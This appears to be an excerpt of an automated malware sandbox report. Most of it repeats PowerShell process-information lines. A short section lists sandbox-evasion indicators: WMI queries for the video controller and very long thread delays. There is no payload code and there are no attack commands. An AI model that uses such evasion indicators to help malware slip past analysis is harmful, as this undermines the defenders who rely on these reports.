Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6629Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3149Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7017Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2574Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5924Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3778Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7591
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1945
